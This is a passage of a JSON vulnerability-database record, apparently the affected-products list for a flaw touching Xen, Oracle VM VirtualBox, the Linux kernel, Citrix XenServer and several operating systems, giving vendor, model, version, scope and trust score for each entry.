        "version": "4.5.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.5"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.4.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.8"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.16"
      },
      {
        "model": "xenserver service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.36"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.20"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos space 15.1f2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.8"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "enterprise linux server eus 6.6.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.0"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "80"
      },
      {
        "model": "junos space 15.1r2.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "xenserver common criteria",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.14"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "xenserver sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "junos space 15.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.0"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.3"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.0.3"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.10"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.23"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.0.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "xenserver sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "junos space 15.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.26"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.1"
      },
      {
        "model": "xenserver common criteria",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.31"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "junos space 14.1r1.9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
